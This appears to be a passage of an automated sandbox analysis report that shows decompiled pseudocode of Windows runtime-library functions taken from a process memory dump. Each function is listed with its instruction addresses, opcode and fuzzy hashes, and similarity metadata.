						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04A67D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04AC7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x04a6ae78
0x04a6ae7c
0x04a6ae7e
0x04a6ae81
0x04a6ae86
0x04a6ae8d
0x04ab2691
0x04a6ae93
0x04a6ae93
0x04a6ae93
0x04a6ae98
0x04a6ae9d
0x04ab26a2
0x04ab26b4
0x04ab26a4
0x04ab26ad
0x04ab26ad
0x04ab26b9
0x00000000
0x04ab26bb
0x00000000
0x04ab26bb
0x04a6aea3
0x04a6aea3
0x04a6aea3
0x04a6aeaa
0x04ab26c0
0x04ab26c9
0x04ab26c9
0x04a6aeb3
0x04ab26d4
0x04ab26e1
0x00000000
0x00000000
0x04ab26e7
0x04ab26ee
0x04ab26f0
0x04ab26f9
0x04ab26f9
0x04ab2702
0x04ab2708
0x04ab2708
0x04ab270b
0x04ab270f
0x04ab2711
0x04ab2711
0x04ab2725
0x04ab2725
0x00000000
0x04a6aeb9
0x04a6aeb9
0x04a6aebf
0x04a6aebf
0x04a6aeb3

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 0fdd574e90c1eaae4cd5299cac34855f2d52ab5950d8707fa7a56732bad8bb2e
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 2D21F672611681DFEB159B28CA58B6577E8EF45348F1904E2DD458B792E734FC40CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 04AC7794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04AC7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4b37b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04A8F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04A67D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04A89AE0();
					_t24 = L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x04ac7799
0x04ac779a
0x04ac779b
0x04ac77a3
0x04ac77ab
0x04ac77ae
0x04ac77b1
0x04ac77b1
0x04ac77bf
0x04ac77c4
0x04ac77c8
0x04ac77ce
0x04ac77d4
0x04ac77e0
0x04ac77e0
0x04ac77d6
0x04ac77d6
0x04ac77de
0x00000000
0x00000000
0x04ac77de
0x04ac77e5
0x04ac77f0
0x04ac77f3
0x04ac77f6
0x04ac77fd
0x04ac7800
0x04ac780c
0x04ac7818
0x04ac782b
0x04ac781a
0x04ac7823
0x04ac7823
0x04ac7830
0x04ac7831
0x04ac7838
0x04ac783d
0x04ac783e
0x04ac784f
0x04ac784f
0x04ac785a

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeba101fc9e4124755ef5296d0236fa77471b763676312315a93e09dc492fa57
Instruction ID: edac408467e3543cfacf128d208832b5cf86cf96690bd4984f9fd681ed94ac03
Opcode Fuzzy Hash: eeba101fc9e4124755ef5296d0236fa77471b763676312315a93e09dc492fa57
Instruction Fuzzy Hash: 7F21C0B6900604AFD725DF69DD90EABB7B8EF48740F10456DF60AC7750E634E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04A7FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04A7FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04A576E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x04a7fd9b
0x04a7fda0
0x04a7fda1
0x04a7fdab
0x04a7fdad
0x04a7fdb0
0x04a7fdb8
0x04a7fe0f
0x04a7fde6
0x04a7fde9
0x04a7fdec
0x04abc0c0
0x04a7fdfe
0x04a7fe06
0x04a7fe06
0x04abc0c8
0x04a7fe2d
0x04a7fe2d
0x00000000
0x04a7fe2d
0x04abc0d1
0x04abc0e0
0x04abc0e5
0x04abc0e5
0x04abc0e8
0x00000000
0x04abc0e8
0x04a7fdf4
0x00000000
0x00000000
0x04a7fdf6
0x04a7fdfa
0x04a7fe1a
0x04a7fe1f
0x04a7fe1f
0x04a7fdfc
0x00000000
0x04a7fdfc
0x04a7fdcc
0x04a7fdd0
0x04a7fe26
0x00000000
0x04a7fe26
0x04a7fdd8
0x04a7fddb
0x04a7fddd
0x04a7fde0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b1bf90b9bf27e7d4966b0569bef9895911366d2c11950ab9b3779a0f1e68218a
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 93216872A00A40DFD731CF49CA40E66B7F5EB98B14F24856EE94987A12E730AE00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A49240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04A49240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4b1f708);
				E04A9D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04A895D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04A895D0();
				_t33 =  *0x4b384c4; // 0x0
				L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4b384c4; // 0x0
				L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4b384c4; // 0x0
				E04A62280(L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4b386b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04A895D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04A895D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04A49325();
					_t50 =  *0x4b384c4; // 0x0
					return E04A9D0D1(L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x04a49240
0x04a49242
0x04a49247
0x04a4924c
0x04a4924e
0x04a49255
0x04a49257
0x04a4925a
0x04a4925f
0x04a4925f
0x04a49266
0x04a49271
0x04a49276
0x04a49279
0x04a4927e
0x04a49295
0x04a4929a
0x04a492b1
0x04a492b6
0x04a492d7
0x04a492dc
0x04a492e0
0x04a492e6
0x04a492e8
0x04a492ee
0x04a49332
0x04a49333
0x04a49337
0x04a49338
0x04a4933a
0x04a4933a
0x04a4933d
0x04a49342
0x04a49342
0x04a49345
0x04a49349
0x04a4934e
0x04a49352
0x04a49357
0x04a492f4
0x04a492f4
0x04a492f6
0x04a492f9
0x04a49300
0x04a49306
0x04a49324
0x04a49324

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fde83ae85844eabd72189cc85ded57c44e9a306dd7a8cbe7f7c3a373ea30545
Instruction ID: 39b650ad41af8fea1f53082e989f3b80d7205cb549c5acbd367b8599f23411bf
Opcode Fuzzy Hash: 3fde83ae85844eabd72189cc85ded57c44e9a306dd7a8cbe7f7c3a373ea30545
Instruction Fuzzy Hash: 232116B1051600EFD721EF68CA40B5AB7F9EF48708F14456DA04A97AB1CA38F951CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04A7B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04A7B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04A62280(_t12, 0x4b38608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04A800C2(0x4b38608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x04a7b395
0x04a7b3a2
0x04a7b3a5
0x04a7b3aa
0x04a7b3b2
0x04a7b3ba
0x04a7b3bd
0x04a7b3c0
0x04a7b3c4
0x04a7b3c9
0x04aba3e9
0x04aba3ed
0x04aba3f0
0x04aba3ff
0x04aba403
0x04aba409
0x00000000
0x00000000
0x04aba40b
0x04aba40b
0x04aba40f
0x04aba415
0x04aba423
0x04aba423
0x04aba415
0x04a7b3d1
0x04a7b3e8
0x04a7b3e8
0x04a7b3d9

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57c95739d8d9bc6f3b08ec50e96904deeefbef9b191e6afe3dc5f35edadef9ea
Instruction ID: 37fbd8968c95e61d55f64f0b2defd2526d1e2f0fca244f0bb7c98b55c6007062
Opcode Fuzzy Hash: 57c95739d8d9bc6f3b08ec50e96904deeefbef9b191e6afe3dc5f35edadef9ea
Instruction Fuzzy Hash: E311AB773051109BDB289F158E80AAB72AAEBC5334B25012DED16C7780D931BC02C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 04AD4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04AD4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4b208d0);
				E04A9D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04AD41E8(__ebx, __edi, __ecx, _t39);
				E04A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4b387e4;
					_t18 =  *0x4b387e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4b35cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4b387e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4b387e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04A47055(_t31 + 0xfffffff8);
								_t24 =  *0x4b387e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4b387e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4b35cd0;
				if( *0x4b35cd0 <= 0) {
					L04A47055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4b387e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4b387e8 = _t30;
						 *0x4b387e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04A9D0D1(L04AD4320());
			}

0x04ad4257
0x04ad4257
0x04ad4257
0x04ad4259
0x04ad425e
0x04ad4263
0x04ad4265
0x04ad4273
0x04ad4278
0x04ad427c
0x04ad427f
0x04ad4281
0x04ad4287
0x04ad42d7
0x04ad42d7
0x04ad42da
0x04ad428d
0x04ad428d
0x04ad428f
0x04ad4292
0x04ad4297
0x04ad429c
0x04ad42a0
0x04ad42a6
0x04ad42a8
0x04ad42ae
0x04ad42b3
0x00000000
0x04ad42ba
0x04ad42ba
0x04ad42bf
0x04ad42c5
0x04ad42ca
0x04ad42cf
0x04ad42d0
0x00000000
0x04ad42d0
0x04ad42b3
0x00000000
0x04ad42a6
0x04ad429c
0x04ad42dc
0x04ad42dc
0x04ad42e3
0x04ad4309
0x04ad42e5
0x04ad42e5
0x04ad42e8
0x04ad42ee
0x04ad42f0
0x00000000
0x04ad42f2
0x04ad42f2
0x04ad42f4
0x04ad42f7
0x04ad42f9
0x04ad4300
0x04ad4300
0x04ad42f0
0x04ad430e
0x04ad431f

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf90ff15772801dfca62880c98d1604bbefbc25fab754a1fb60b567c0ffa5539
Instruction ID: 52b121d50d7397b728a922dd61b0c5142734817b875d4c0ecce7417be9562f1b
Opcode Fuzzy Hash: bf90ff15772801dfca62880c98d1604bbefbc25fab754a1fb60b567c0ffa5539
Instruction Fuzzy Hash: 70215E70501B01DFDB15EF6AD1406587BF2FB8971AB5082AED11A8F250D735F982CF92

Uniqueness

Uniqueness Score: -1.00%

Function 04AC46A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04AC46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04A8F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04A7D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04A677F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x04ac46b7
0x04ac46ba
0x04ac46c5
0x04ac46c8
0x04ac46d0
0x04ac46d4
0x04ac46e6
0x04ac46e9
0x04ac46f4
0x04ac46ff
0x04ac4705
0x04ac4706
0x04ac470c
0x04ac4713
0x04ac471b
0x04ac4723
0x04ac4725
0x04ac46d6
0x04ac46d9
0x04ac46db
0x04ac46db
0x04ac4732

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 1d9117102c9e001e1285e8aab26a4c92b6c982ad51228ae138a435bb66c825cb
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: B411E572504208BFD7159F5CD9808BEBBB9EF99304F10806EF944CB350DA319D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04A72397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04A72397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4b3848c != 0) {
					L04A6FAD0(0x4b38610);
					if( *0x4b3848c == 0) {
						E04A6FA00(0x4b38610, _t19, _t27, 0x4b38610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04A72581(0x4b38610, 0x4a250a0, _t26, _t27, _t28);
						E04A6FA00(0x4b38610, 0x4a250a0, _t27, 0x4b38610);
					}
				} else {
					L1:
					_t11 =  *0x4b38614; // 0x0
					if(_t11 == 0) {
						_t11 = E04A84886(0x4a21088, 1, 0x4b38614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04A72581(0x4b38610, (_t11 << 4) + 0x4a25070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x04a723b0
0x04a723b6
0x04a72409
0x04a72415
0x04ab5ae9
0x00000000
0x04a7241b
0x04a7241b
0x04a7241d
0x04a72427
0x04a7242e
0x04a72430
0x04a72430
0x04a723b8
0x04a723b8
0x04a723b8
0x04a723bf
0x04a723fc
0x04a723fc
0x04a723c1
0x04a723c3
0x04a723d0
0x04a723d8
0x04a723d8
0x04a723dc
0x04a723de
0x04a723e1
0x04a723e1
0x04a723ec

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18ddaac7f5ed833cba6e65ab654f75fa91689653ca37dba348f96af58a85a71
Instruction ID: ea8cc7d10d3f71514858cdf3c810ccd1abfeb43224a9ab9bd598d88e7d0f0f48
Opcode Fuzzy Hash: f18ddaac7f5ed833cba6e65ab654f75fa91689653ca37dba348f96af58a85a71
Instruction Fuzzy Hash: DE114E337043106BF330AB2EAD40F59B2DCEB54719F5444AAF602A7290D574F8419755

Uniqueness

Uniqueness Score: -1.00%

Function 04A837F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E04A837F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04A62280(_t6, 0x4b38550);
				}
				_t29 = E04A8387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04A5FFB0(0x4b38550, _t27, 0x4b38550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x04a837fa
0x04a837fc
0x04a83805
0x04a83808
0x04a83808
0x04a83814
0x04a83818
0x04a83846
0x04a83848
0x04a8384b
0x04a8384b
0x04a83852
0x00000000
0x04a83854
0x04a83856
0x00000000
0x00000000
0x04a83863
0x00000000
0x04a83863
0x04a8381a
0x04a8381a
0x04a8381f
0x04a8386e
0x04a8386e
0x04a83871
0x04a83873
0x04a83873
0x04a83868
0x00000000
0x04a83868
0x04a83821
0x04a83826
0x00000000
0x00000000
0x04a83828
0x04a8382a
0x04a83841
0x00000000
0x04a83841

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4a4f36b0a5386e89fccc1cc18e6120f181b673bbaae50700f1824e3dd94c97
Instruction ID: c26f7b540a38b225fd57a61c82507de6c2bae65c94c1231083bdee25b5a54422
Opcode Fuzzy Hash: 2b4a4f36b0a5386e89fccc1cc18e6120f181b673bbaae50700f1824e3dd94c97
Instruction Fuzzy Hash: 8101D6B2A026149BDB37AF1ADA40E2ABBB6DF85F50B15406DEC458B210EB35F801C790

Uniqueness

Uniqueness Score: -1.00%

Function 04A4C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E04A4C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4b3d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04A5EEF0(0x4b370a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04ACF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04A5EB70(_t29, 0x4b370a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04A8B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04ACF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4b370c0; // 0x0
					while(_t38 != 0x4b370c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4b3b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x04a4c96a
0x04a4c974
0x04a4c988
0x04a4c98a
0x04ab7c9d
0x04ab7c9f
0x04ab7ca4
0x04ab7cae
0x04ab7cf0
0x04ab7cf5
0x04ab7cfa
0x04a4c992
0x04a4c996
0x04a4c997
0x04a4c998
0x04a4c9a3
0x04a4c9a3
0x04ab7cb0
0x04ab7cb7
0x04ab7cbb
0x00000000
0x00000000
0x04ab7cbd
0x04ab7ce8
0x04ab7cc5
0x04ab7cc8
0x04ab7cca
